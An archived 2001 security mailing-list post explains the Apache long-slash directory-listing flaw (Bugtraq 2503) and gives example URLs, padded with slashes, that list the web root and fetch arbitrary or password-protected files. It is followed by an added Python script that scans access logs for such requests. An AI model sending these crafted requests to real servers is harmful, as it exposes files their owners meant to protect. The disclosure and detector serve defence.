Apache Artificially Long Slash Path Directory Listing Vulnerability
BUGTRAQ ID 2503

I'm not really sure if this is a known issue, but here goes:

Old news:
As the vulnerability's description describes, any user with a web browser can obtain a directory listing of the Apache http root directory, even if the directory contains an index.html file and is password protected.

New news:
You can access files/directories under the http root by subtracting the number of slashes from the appended URL equal to the number of characters in the file or directory name you are attempting to access.

Example:

Standard Directory List:
http://15.16.17.18////////////////////////////////////////////////////////////////////

Download an Arbitrary file:
http://15.16.17.18////////////////////////////////////////////////////////thisfile.txt

Or In a Directory:
http://15.16.17.18////////////////////////////////////////////////subdir1/thisfile.txt

I've made no attempt to contact The Apache Group to discuss this as it is the result of a known vulnerability and patches have already been released to fix vulnerable systems.

Brian Dinello
Security Consultant
VigilantMinds, Inc.
brian.dinelloat_private
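A detection-side companion to the post above, added here as an example and not part of the original message: it scans Apache access-log lines in Common Log Format for request paths padded with long runs of slashes and reports which resource each request was reaching for. The log lines are constructed, and the threshold of 16 and the names `scan` and `longest_slash_run` are assumptions.

```python
import re
from urllib.parse import unquote

# Common Log Format: client ident user [time] "METHOD path PROTO" status size
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})')
SLASH_RUN_RE = re.compile(r"/{2,}")
THRESHOLD = 16  # assumed cut-off; tune against your own traffic

def decoded_path(raw_path):
    """Drop the query string and decode %2F so encoded slashes are counted."""
    return unquote(raw_path.split("?", 1)[0])

def longest_slash_run(raw_path):
    """Length of the longest run of consecutive '/' in the request path."""
    runs = SLASH_RUN_RE.finditer(decoded_path(raw_path))
    return max((len(m.group()) for m in runs), default=0)

def scan(lines, threshold=THRESHOLD):
    """Return one finding per request whose path has a slash run >= threshold."""
    findings = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        client, raw_path, status = m.groups()
        run = longest_slash_run(raw_path)
        if run >= threshold:
            findings.append({
                "client": client,
                "run": run,
                # Collapsing the padding shows which resource was requested.
                "target": SLASH_RUN_RE.sub("/", decoded_path(raw_path)),
                # A 2xx status means content was served; triage these first.
                "served": status.startswith("2"),
            })
    return findings

# Constructed sample log: documentation addresses, made-up times and sizes.
TS = "[26/Jul/2001:14:00:00 -0700]"
SAMPLE_LOG = [
    f'198.51.100.7 - - {TS} "GET /index.html HTTP/1.0" 200 1024',
    f'198.51.100.9 - - {TS} "GET {"/" * 68} HTTP/1.0" 200 2048',
    f'198.51.100.9 - - {TS} "GET {"/" * 56}thisfile.txt HTTP/1.0" 200 512',
    f'198.51.100.9 - - {TS} "GET {"/" * 48}subdir1/thisfile.txt HTTP/1.0" 403 290',
    f'198.51.100.12 - - {TS} "GET /docs//readme.txt HTTP/1.0" 200 300',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Findings with `served` set are the ones to check against the patch level of the host, since a patched server should not answer these requests with content.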
This archive was generated by hypermail 2b30 : Thu Jul 26 2001 - 14:58:39 PDT